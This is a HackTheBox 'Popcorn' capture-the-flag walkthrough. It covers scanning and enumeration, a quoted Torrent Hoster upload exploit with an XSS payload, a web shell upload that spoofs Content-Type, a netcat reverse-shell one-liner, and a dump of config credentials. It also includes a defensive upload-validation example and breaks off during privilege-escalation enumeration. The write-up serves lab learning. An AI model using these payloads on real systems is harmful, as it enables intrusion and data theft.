Popcorn-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: Torrent Hoster file upload vulnerability, bypassing the upload format check for a web shell, Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

Reference: https://cyberkareem.medium.com/hackthebox-popcorn-walkthrough-68a0e719c8bc

Reference: https://0xdf.gitlab.io/2020/06/23/htb-popcorn.html

Reference: https://kalistudy-bucket.oss-cn-hongkong.aliyuncs.com/uploads/2019/12/Popcorn.pdf

0x01 Obtaining user access

1. Get the target's IP address: 10.10.10.6

2. Scan for open ports

┌─[us-vip-22]─[10.10.14.3]─[shiyan@htb-rlecfd7idm]─[~/Desktop]
└──╼ [★]$ sudo nmap -p- -Pn --min-rate=10000 10.10.10.6
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-02 12:50 GMT
Nmap scan report for 10.10.10.6
Host is up (0.096s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

┌─[us-vip-22]─[10.10.14.3]─[shiyan@htb-rlecfd7idm]─[~/Desktop]
└──╼ [★]$ sudo nmap -p22,80 -sV -sC --min-rate=5000 10.10.10.6
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-02 13:02 GMT
Nmap scan report for 10.10.10.6
Host is up (0.0037s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3ec81b15211550ec6e63bcc56b807b38 (DSA)
|_ 2048 aa1f7921b842f48a38bdb805ef1a074d (RSA)
80/tcp open http Apache httpd 2.2.12
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Did not follow redirect to http://popcorn.htb/
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.83 seconds

3. The scan reveals a new hostname, so bind it in the local hosts file

┌─[us-vip-22]─[10.10.14.3]─[shiyan@htb-rlecfd7idm]─[~/Desktop]
└──╼ [★]$ echo "10.10.10.6 popcorn.htb" | sudo tee -a /etc/hosts
10.10.10.6 popcorn.htb

4. Enumerate directories on the web service found on port 80

┌─[us-vip-22]─[10.10.14.3]─[shiyan@htb-rlecfd7idm]─[~/Desktop]
└──╼ [★]$ dirsearch -u http://popcorn.htb/
Directory /usr/lib/python3/dist-packages/dirsearch is not writable
Directory /usr/lib/python3/dist-packages/dirsearch is not writable

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30
Wordlist size: 10903

Output File: /usr/lib/python3/dist-packages/dirsearch/reports/popcorn.htb/-_24-01-02_13-09-20.txt

Error Log: /usr/lib/python3/dist-packages/dirsearch/logs/errors-24-01-02_13-09-20.log

Target: http://popcorn.htb/

[13:09:21] Starting:
[13:09:26] 200 - 177B - /index
[13:09:26] 200 - 177B - /index.html
[13:09:29] 200 - 47KB - /test.php
[13:09:29] 200 - 48KB - /test/tmp/
[13:09:29] 200 - 48KB - /test/
[13:09:29] 200 - 48KB - /test/reports
[13:09:29] 200 - 48KB - /test/version_tmp/
[13:09:29] 200 - 47KB - /test

Task Completed
<dirsearch.dirsearch.Program object at 0x7fdf28f8db50>


┌─[us-vip-22]─[10.10.14.3]─[shiyan@htb-rlecfd7idm]─[~/Desktop]
└──╼ [★]$ sudo gobuster dir -u http://popcorn.htb/ --wordlist=/usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://popcorn.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2024/01/02 13:17:43 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 283]
/.htpasswd (Status: 403) [Size: 288]
/.htaccess (Status: 403) [Size: 288]
/cgi-bin/ (Status: 403) [Size: 287]
/index (Status: 200) [Size: 177]
/index.html (Status: 200) [Size: 177]
/test (Status: 200) [Size: 47353]
/torrent (Status: 301) [Size: 312] [--> http://popcorn.htb/torrent/]
Progress: 4614 / 4615 (99.98%) [ERROR] 2024/01/02 13:17:54 [!] Get "http://popcorn.htb/server-status": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

===============================================================
2024/01/02 13:17:54 Finished
===============================================================

5. At this point the directory scan has turned up some useful paths

http://popcorn.htb/test

http://popcorn.htb/torrent/

6. This page allows self-registration, so we registered the following test account

Username: test
Password: test

7. Use searchsploit to look for known vulnerabilities in the target application

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Torrent Hoster
------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------- ---------------------------------
Torrent Hoster - Remount Upload | php/webapps/11746.txt
------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/11746.txt
Exploit: Torrent Hoster - Remount Upload
URL: https://www.exploit-db.com/exploits/11746
Path: /usr/share/exploitdb/exploits/php/webapps/11746.txt
Codes: N/A
Verified: False
File Type: HTML document, ASCII text
Copied to: /home/kali/桌面/11746.txt

┌──(kali㉿kali)-[~/桌面]
└─$ cat 11746.txt
========================================================================================
| # Title : Torrent Hoster Remont Upload Exploit
| # Author : El-Kahina
| # Home : www.h4kz.com |
| # Script : Powered by Torrent Hoster.
| # Tested on: windows SP2 Fran&#65533;ais V.(Pnx2 2.0) + Lunix Fran&#65533;ais v.(9.4 Ubuntu)
| # Bug : Upload
|
====================== Exploit By El-Kahina =================================
# Exploit :

1 - use tamper data :

http://127.0.0.1/torrenthoster//torrents.php?mode=upload

2-
<center>
Powered by Torrent Hoster
<br />
<form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
<strong>&#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533; &#65533;&#65533; &#65533;&#65533;:</strong> <?php echo $maxfilesize; ?>&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;<br />
<br>
<input type="file" name="upfile" size="50" /><br />
<input type="submit" value="&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;" id="upload" />
</form>
<div id="part2" style="display: none;">&#65533;&#65533;&#65533; &#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533; .. &#65533;&#65533; &#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;</div>
</center>

3 - http://127.0.0.1/torrenthoster/torrents/ (to find shell)

4 - Xss:

http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt>

==========================================
Greetz : Exploit-db Team
all my friend :(Dz-Ghost Team )
im indoushka's sister
------------------------------------------

8. This shows that an upload vulnerability exists here

9. A few quick attempts showed that images cannot be uploaded here; a torrent file is required. After looking around for a file in this format, I found the torrent for an old Kali image and used that for the upload.

https://old.kali.org/kali-images/kali-1.0.0/kali-linux-1.0.0-amd64.iso.torrent

10. After the upload succeeds, visit the details page for that file

http://popcorn.htb/torrent/torrents.php?mode=details&id=bc233c553f9f8562e0584e23c2a6765aa504e81b

11. Poking around further, the image upload on this page accepts image-format files

12. Upload a PHP web shell directly here, only changing the Content-Type header to image/png to bypass the upload restriction

13. As can be seen, a PHP file was uploaded successfully

14. After some digging, the uploaded file sits in the upload directory

http://popcorn.htb/torrent/upload/
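The bypass in steps 11 to 14 works because the server trusts the client-supplied Content-Type and keeps the client's .php extension in the stored name. As an added example (not the writeup's or Torrent Hoster's code), here is a small multipart parser with that trusting check beside a server-side check that ignores Content-Type, decides from the file signature, and names the stored file from what it detected; the image allowlist and the sample request body are constructed for the example.

```python
"""Added example, not part of the writeup or of Torrent Hoster: a small
multipart/form-data parser, the trusting check that the Content-Type bypass
above defeats, and a server-side check that ignores Content-Type, decides from
the file signature, and names the stored file from what it detected."""
import hashlib
import os
import re

# File signatures of the image formats the upload is meant to accept.
# The allowlist itself is an assumption made for this example.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}


def parse_multipart(body: bytes, boundary: str) -> list:
    """Split a multipart/form-data body into parts of {headers, data}."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        if chunk.startswith(b"\r\n"):        # CRLF that follows the delimiter
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):           # CRLF that precedes the next delimiter
            data = data[:-2]
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.decode("latin-1").partition(":")
            headers[name.strip().lower()] = value.strip()
        parts.append({"headers": headers, "data": data})
    return parts


def client_filename(part: dict) -> str:
    """Filename as declared by the client (attacker-controlled)."""
    cd = part["headers"].get("content-disposition", "")
    m = re.search(r'filename="([^"]*)"', cd)
    return os.path.basename(m.group(1)) if m else ""


def weak_check(part: dict) -> bool:
    """The check the bypass exploits: trust the client-supplied Content-Type."""
    return part["headers"].get("content-type", "").startswith("image/")


def detect_image_type(data: bytes):
    """Return 'png', 'jpg' or 'gif' from the file signature, else None."""
    for ext, magic in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def strong_check(part: dict):
    """Server-side decision that never reads Content-Type.
    Returns (True, stored_name) or (False, reason)."""
    ext = os.path.splitext(client_filename(part))[1].lstrip(".").lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension '{ext}' not allowed"
    detected = detect_image_type(part["data"])
    if detected is None:
        return False, "content has no recognised image signature"
    if detected != ("jpg" if ext == "jpeg" else ext):
        return False, f"extension '{ext}' does not match detected {detected}"
    # Server-chosen name: digest of the content plus the *detected* extension,
    # so the stored path can never end in .php whatever the client sent.
    stored = hashlib.sha1(part["data"]).hexdigest() + "." + detected
    return True, stored


# Constructed request body: a genuine PNG header, then a PHP file whose
# Content-Type was rewritten to image/png as described in step 12.
BOUNDARY = "----ExampleBoundary"
SAMPLE_BODY = (
    b"------ExampleBoundary\r\n"
    b'Content-Disposition: form-data; name="image"; filename="shot.png"\r\n'
    b"Content-Type: image/png\r\n\r\n"
    b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\r\n"
    b"------ExampleBoundary\r\n"
    b'Content-Disposition: form-data; name="image"; filename="shell.php"\r\n'
    b"Content-Type: image/png\r\n\r\n"
    b"<?php echo 'constructed placeholder'; ?>\r\n"
    b"------ExampleBoundary--\r\n"
)


def demo() -> dict:
    """Run both checks over the sample body; returns results per filename."""
    results = {}
    for part in parse_multipart(SAMPLE_BODY, BOUNDARY):
        results[client_filename(part)] = (weak_check(part), strong_check(part)[0])
    return results


if __name__ == "__main__":
    for name, (weak, strong) in demo().items():
        print(f"{name:10s} Content-Type check: {weak}  signature check: {strong}")
```

The PHP part passes the Content-Type check and fails the signature check; a PHP body renamed to .png fails as well, because the decision never looks at anything the client declared.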

15. Run a reverse shell straight from the upload directory to get an initial foothold

http://popcorn.htb/torrent/upload/bc233c553f9f8562e0584e23c2a6765aa504e81b.php

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.4 443 >/tmp/f

16. Initial shell obtained

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.6] 43798
sh: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
sh: python3: not found
$ ls -la
total 120
drwxrwxrwx 2 www-data www-data 4096 Jan 2 15:55 .
drwxr-xr-x 15 www-data www-data 4096 Mar 17 2017 ..
-rw-r--r-- 1 www-data www-data 59294 Mar 17 2017 723bc28f9b6f924cca68ccdff96b6190566ca6b4.png
-rw-r--r-- 1 www-data www-data 13585 Jan 2 15:55 bc233c553f9f8562e0584e23c2a6765aa504e81b.php
-rw-r--r-- 1 www-data www-data 33029 Jun 2 2007 noss.png
$ pwd
/var/www/torrent/upload

17. After digging through the website directories, I finally found a configuration file containing credentials

$ cd ../
$ ls -la
total 196
drwxr-xr-x 15 www-data www-data 4096 Mar 17 2017 .
drwxr-xr-x 4 www-data www-data 4096 Apr 11 2017 ..
drwxr-xr-x 2 www-data www-data 4096 Jan 31 2010 PNG
drwxr-xr-x 4 www-data www-data 4096 Jun 3 2007 admin
-rw-r--r-- 1 www-data www-data 1704 Jun 1 2007 browse.php
-rw-r--r-- 1 www-data www-data 3042 Jun 3 2007 comment.php
-rw-r--r-- 1 www-data www-data 6684 Nov 21 19:26 config.php
drwxr-xr-x 2 www-data www-data 4096 Jun 3 2007 css
drwxr-xr-x 2 www-data www-data 4096 Jun 3 2007 database
-rw-r--r-- 1 www-data www-data 125 Jan 20 2007 download.php
-rw-r--r-- 1 www-data www-data 1612 Jun 3 2007 edit.php
drwxr-xr-x 2 www-data www-data 4096 Jan 31 2010 health
-rw-r--r-- 1 www-data www-data 3765 Mar 6 2005 hide.js
drwxr-xr-x 2 www-data www-data 4096 Jan 31 2010 images
-rw-r--r-- 1 www-data www-data 1604 Jun 3 2007 index.php
drwxr-xr-x 2 www-data www-data 4096 Jun 3 2007 js
drwxr-xr-x 2 www-data www-data 4096 Jun 3 2007 lib
-rw-r--r-- 1 www-data www-data 1825 Jan 9 2007 login.php
-rw-r--r-- 1 www-data www-data 329 Dec 28 2006 logout.php
-rw-r--r-- 1 www-data www-data 28104 Jan 27 2010 preview.gif
drwxr-xr-x 2 www-data www-data 4096 Jun 3 2007 readme
-rw-r--r-- 1 www-data www-data 3307 Jun 10 2005 rss.php
-rw-r--r-- 1 www-data www-data 573 Nov 29 2006 secure.php
-rw-r--r-- 1 www-data www-data 6257 Mar 6 2005 sorttable.js
-rw-r--r-- 1 www-data www-data 321 Nov 28 2006 stylesheet.css
drwxr-xr-x 3 www-data www-data 4096 Jun 3 2007 templates
-rw-r--r-- 1 www-data www-data 4190 Dec 28 2006 thumbnail.php
drwxrwxrwx 2 www-data www-data 4096 Jan 2 15:44 torrents
-rw-r--r-- 1 www-data www-data 7221 Jun 3 2007 torrents.php
-rw-r--r-- 1 www-data www-data 539 Nov 30 2006 update_stats.php
-rw-r--r-- 1 www-data www-data 986 Jun 3 2007 update_stats2.php
drwxrwxrwx 2 www-data www-data 4096 Jan 2 15:55 upload
-rw-r--r-- 1 www-data www-data 15087 Mar 17 2017 upload.php
-rw-r--r-- 1 www-data www-data 1467 Jun 3 2007 upload_file.php
drwxr-xr-x 3 www-data www-data 4096 Jan 31 2010 users
-rw-r--r-- 1 www-data www-data 3548 Mar 6 2005 validator.php
$ cd users
$ ls -la
total 60
drwxr-xr-x 3 www-data www-data 4096 Jan 31 2010 .
drwxr-xr-x 15 www-data www-data 4096 Mar 17 2017 ..
-rw-r--r-- 1 www-data www-data 2204 Mar 6 2005 change_password.php
-rw-r--r-- 1 www-data www-data 1753 Mar 6 2005 change_settings.php
-rw-r--r-- 1 www-data www-data 680 Mar 6 2005 change_settings_form.php
-rw-r--r-- 1 www-data www-data 1555 Mar 11 2005 forgot_password.php
-rw-r--r-- 1 www-data www-data 701 Jul 7 2006 img.jpg
-rw-r--r-- 1 www-data www-data 6891 Jan 24 2007 index.php
-rw-r--r-- 1 www-data www-data 822 Jul 7 2006 php_captcha.php
-rw-r--r-- 1 www-data www-data 2287 Jan 24 2007 registration.php
drwxr-xr-x 2 www-data www-data 4096 Jun 3 2007 templates
-rw-r--r-- 1 www-data www-data 11110 Mar 6 2005 validation_class.php
$ cat change_password.php
<?

include("../config.php");
require_login();

/* form has been submitted, check if it the user login information is correct */
if (match_referer() && isset($_POST)) {
$frm = $_POST;
$errormsg = validate_form($frm, $errors);

if (empty($errormsg)) {
update_password($frm["newpassword"]);
$noticemsg = "Password change successful";
}
}

$DOC_TITLE = "Change Password";
include("$CFG->templatedir/header.php");
include("$CFG->templatedir/form_header.php");
include("templates/change_password_form.php");
include("$CFG->templatedir/footer.php");

/******************************************************************************
* FUNCTIONS
*****************************************************************************/

function validate_form(&$frm, &$errors) {
/* validate the forgot password form, and return the error messages in a string.
* if the string is empty, then there are no errors */

$errors = new Object;
$msg = "";

if (empty($frm["oldpassword"])) {
$errors->oldpassword = true;
$msg .= "You did not specify your old password";

} elseif (! password_valid($frm["oldpassword"])) {
$errors->oldpassword = true;
$msg .= "Your old password is invalid";

} elseif (empty($frm["newpassword"])) {
$errors->newpassword = true;
$msg .= "You did not specify your new password";

} elseif (empty($frm["newpassword2"])) {
$errors->newpassword2 = true;
$msg .= "You did not confirm your new password";

} elseif ($frm["newpassword"] != $frm["newpassword2"]) {
$errors->newpassword = true;
$errors->newpassword2 = true;
$msg .= "Your new passwords do not match";
}

return $msg;
}

function password_valid($password) {
/* return true if the user's password is valid */

global $_SESSION;

$username = $_SESSION["userName"];
$password = md5($password);

$qid = db_query("SELECT 1 FROM users WHERE username = '$username' AND password = '$password'");
return db_num_rows($qid);
}

function update_password($newpassword) {
/* set the user's password to the new one */

global $_SESSION;

$username = $_SESSION["userName"];
$newpassword = md5($newpassword);

$qid = db_query("UPDATE users SET password = '$newpassword' WHERE username = '$username'");
}

?>
$ cd ../
$ cat config.php
<?php

//rename this file to config.php
/* turn on verbose error reporting (15) to see all warnings and errors */
error_reporting(15);

//include "forumdb.php";

//define a generic object to hold all the configuration variables
class object {};

//declare an instance of the generic object
$CFG = new object;
//declare root directory
$CFG->dirroot = dirname(__FILE__);

//Edit This For TORRENT HOSTER Database
//database configuration
$CFG->host = "localhost";
$CFG->dbName = "torrenthoster"; //db name
$CFG->dbUserName = "torrent"; //db username
$CFG->dbPassword = "SuperSecret!!"; //db password

$dbhost = $CFG->host;
$dbuser = $CFG->dbUserName;
$dbpass = $CFG->dbPassword;
$database = $CFG->dbName;

/* directory configuration, if all your webtorrent.com files are in one directory
* you probably only need to set the wwwroot variable. valid examples are:
*
* $CFG->wwwroot = "http://myserver.com/webtorrent";
* $CFG->wwwroot = "http://localhost/webtorrent";
* $CFG->wwwroot = "http://myserver.com";
*
* do not include the trailing slash. dirroot is the physical path on your
* server where the application can find it's files. for more security, it is
* recommended that you move the libraries and templates ($CFG->libdir
* and $CFG->templatedir) outside of your web directories.
*/

/* Edit below this */

$CFG->wwwroot = "http://popcorn.htb/torrent"; //full path to your website
$CFG->forumroot = "http://www.myanmartorrents.com/phpbb";
$CFG->webname = "Torrent Hoster";
$CFG->support = "webmaster@wmyanmartorrents.com";
$CFG->rssnum = "10"; //number of rss to show
$CFG->mainnews = "10"; //number of news on the main page, use 0 to not print news on main page
$CFG->maintorrents= "30";//number of torrents in the main page
$CFG->torrents = "$CFG->dirroot/torrents"; //torrent folder repect to your wwwroot
$CFG->usesub = "yes"; //Do you want to use Subcategories? "yes" or "no"
//$CFG->usephpbb = "no"; //put "yes" if you want to connect with phpbb users. "yes" or "no" << DO NOT USE IT YET
$CFG->regdownload = "yes"; //only registered users can download torrents. "yes" or "no"
$CFG->regupload = "yes"; //only registered users can upload torrents. "yes" or "no"
/*
no to change below this (i think)
*/

$CFG->templatedir = "$CFG->dirroot/templates";
$CFG->libdir = "$CFG->dirroot/lib";
$CFG->imagedir = "$CFG->wwwroot/images";
$CFG->health = "$CFG->wwwroot/health";
$CFG->icondir = "$CFG->imagedir/icons";
$CFG->version = "2.0";

//$CFG->sessionname = "mtc";

/* define database error handling behavior, since we are in development stages
* we will turn on all the debugging messages to help us troubleshoot */
$DB_DEBUG = true;
$DB_DIE_ON_FAIL = true;

//start session to hold username and password when linking from page to page
session_start();
header("Cache-control: private"); // IE 6 Bug Fix.

//load up libraries
require "lib/dblib.php";
require "lib/stdlib.php";
require "lib/webtorrent.php";

/* setup some global variables */
$ME = qualified_me();

/* connect to the database */
db_connect($CFG->host, $CFG->dbName, $CFG->dbUserName, $CFG->dbPassword);

/*
Print out header
*******************************************/
function stheader($title)
{
//global $time_begin;
//$time_begin = get_micro_time();

//global $sitename;
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<link rel="stylesheet" href="stylesheet.css" type="text/css" />
<title>T-Xore : ';

//echo htmlentities($title);

echo '</title>
</head><body>
<script type="text/javascript" src="dyn.js"></script>
';

}

// Get microtime
function get_micro_time()
{
list($usec, $sec) = explode(' ', microtime());
return ((float)$usec + (float)$sec);
}

function connect_forum($fdbhost, $fdbuser, $fdbpass, $fdatabase)
{
$errormes = 'The sql server has encountered a problem, we are trying to fix it as soon as possible';
@$connection = mysql_connect($fdbhost, $fdbuser, $fdbpass);
@mysql_select_db($fdatabase) or die($errormes);
}

function torsize ($size)
{
if ($size >= 1099511627776) {$size = round($size / 1024 / 1024 / 1024 / 1024, 2).' TB';}
elseif ($size >= 1073741824) {$size = round($size / 1024 / 1024 / 1024, 2).' GB';}
elseif ($size >= 1048576) {$size = round($size / 1024 / 1024, 2).' MB';}
elseif ($size >= 1024) {$size = round($size / 1024, 2).' KB';}
else {$size = $size.' Byte';}
return $size;
}

/* show files contained in a torrent */
function showfiles($hash)
{
$filename2 = $hash;
//global $CFG->torrents;
include_once("lib/BDecode.php") ;
include_once("lib/BEncode.php") ;
include_once("config.php") ;

$filename = "torrents/$filename2.btf";

$stream = @file_get_contents("$filename");


if ($stream == FALSE)
{
echo 'No details availiable... 1 ';
}
if(!isset($stream))
{
echo 'No details availiable... 2 ';
break;
}
else
{

$array = BDecode($stream);
if ($array === FALSE)

{
echo 'No details availiable... 3 ';
break;
}
else
{
if(array_key_exists("info", $array) === FALSE){
echo 'No details availiable... 4 ';
break;
}
else
{
$infovariable = $array["info"];
if (isset($infovariable["files"]))
{

$filecount = "";
foreach ($infovariable["files"] as $file)
{

$row_color = ($row_count % 2) ? $color1 : $color2;

$filecount += "1";
$multiname = $file['path'];
$multitorrentsize = torsize ($file['length']);
$torrentsize += $file['length'];
$combinedsize = torsize($torrentsize);
$strname = strip_tags ($multiname[0]);

$strname = htmlentities($strname);
$strname = strip_tags($strname);

echo "<tr><td width=\"50%\">$strname</td><td> $multitorrentsize</td></tr>";
$row_count++;
}
}
else
{
$singletf = $infovariable['name'] ;
$singletf = strip_tags($singletf );
$torrentsize = torsize($infovariable['length']);

$singletf = htmlentities($singletf);
$singletf = strip_tags($singletf);

echo "<tr><td width=\"80%\">$torrentsize</td><td>$singletf</td></tr>";
}
}
}
}
}

function connect ($dbhost, $dbuser, $dbpass, $database)
{
$errormes = 'The sql server has encountered a problem, we are trying to fix it as soon as possible';
@$connection = mysql_connect($dbhost, $dbuser, $dbpass);
@mysql_select_db($database) or die($errormes);
}


?>
$

18. Highlighting the credentials that were found

$CFG->host = "localhost";
$CFG->dbName = "torrenthoster"; //db name
$CFG->dbUserName = "torrent"; //db username
$CFG->dbPassword = "SuperSecret!!"; //db password

19. Then I went through the user's home directory and found that I could read user.txt directly, heh

$ ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Mar 17 2017 .
drwxr-xr-x 21 root root 4096 Jan 2 14:48 ..
drwxr-xr-x 3 george george 4096 Oct 26 14:57 george
$ ls -la /home/george
total 860
drwxr-xr-x 3 george george 4096 Oct 26 14:57 .
drwxr-xr-x 3 root root 4096 Mar 17 2017 ..
lrwxrwxrwx 1 george george 9 Oct 26 2020 .bash_history -> /dev/null
-rw-r--r-- 1 george george 220 Mar 17 2017 .bash_logout
-rw-r--r-- 1 george george 3180 Mar 17 2017 .bashrc
drwxr-xr-x 2 george george 4096 Mar 17 2017 .cache
-rw-r--r-- 1 george george 675 Mar 17 2017 .profile
-rw-r--r-- 1 george george 0 Mar 17 2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17 2017 torrenthoster.zip
-rw-r--r-- 1 george george 33 Jan 2 14:48 user.txt
$ cat /home/george/user.txt
46716af63b9b0e4f27387e81f451e5da
$

0x02 Obtaining root access

20. Checking the process list shows that a MySQL database is also running

$ ss -lt
sh: ss: not found
$ ps -aux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 2528 1416 ? Ss 14:48 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S< 14:48 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 14:48 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< 14:48 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 14:48 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 14:48 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 14:48 0:00 [cpuset]
root 8 0.0 0.0 0 0 ? S< 14:48 0:00 [khelper]
root 9 0.0 0.0 0 0 ? S< 14:48 0:00 [netns]
root 10 0.0 0.0 0 0 ? S< 14:48 0:00 [async/mgr]
root 11 0.0 0.0 0 0 ? S< 14:48 0:00 [kintegrityd/0]
root 12 0.0 0.0 0 0 ? S< 14:48 0:00 [kblockd/0]
root 13 0.0 0.0 0 0 ? S< 14:48 0:00 [kacpid]
root 14 0.0 0.0 0 0 ? S< 14:48 0:00 [kacpi_notify]
root 15 0.0 0.0 0 0 ? S< 14:48 0:00 [kacpi_hotplug]
root 16 0.0 0.0 0 0 ? S< 14:48 0:00 [ata/0]
root 17 0.0 0.0 0 0 ? S< 14:48 0:00 [ata_aux]
root 18 0.0 0.0 0 0 ? S< 14:48 0:00 [ksuspend_usbd]
root 19 0.0 0.0 0 0 ? S< 14:48 0:00 [khubd]
root 20 0.0 0.0 0 0 ? S< 14:48 0:00 [kseriod]
root 21 0.0 0.0 0 0 ? S< 14:48 0:00 [kmmcd]
root 22 0.0 0.0 0 0 ? S< 14:48 0:00 [bluetooth]
root 23 0.0 0.0 0 0 ? S 14:48 0:00 [khungtaskd]
root 24 0.0 0.0 0 0 ? S 14:48 0:00 [pdflush]
root 25 0.0 0.0 0 0 ? S 14:48 0:00 [pdflush]
root 26 0.0 0.0 0 0 ? S< 14:48 0:00 [kswapd0]
root 27 0.0 0.0 0 0 ? S< 14:48 0:00 [aio/0]
root 28 0.0 0.0 0 0 ? S< 14:48 0:00 [ecryptfs-kthrea]
root 29 0.0 0.0 0 0 ? S< 14:48 0:00 [crypto/0]
root 32 0.0 0.0 0 0 ? S< 14:48 0:00 [pciehpd]
root 34 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_0]
root 35 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_1]
root 36 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_2]
root 37 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_3]
root 38 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_4]
root 39 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_5]
root 40 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_6]
root 41 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_7]
root 42 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_8]
root 43 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_9]
root 44 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_10]
root 45 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_11]
root 46 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_12]
root 47 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_13]
root 48 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_14]
root 49 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_15]
root 50 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_16]
root 51 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_17]
root 52 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_18]
root 53 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_19]
root 54 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_20]
root 55 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_21]
root 56 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_22]
root 57 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_23]
root 58 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_24]
root 59 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_25]
root 60 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_26]
root 61 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_27]
root 62 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_28]
root 63 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_29]
root 64 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_30]
root 66 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_31]
root 68 0.0 0.0 0 0 ? S< 14:48 0:00 [kstriped]
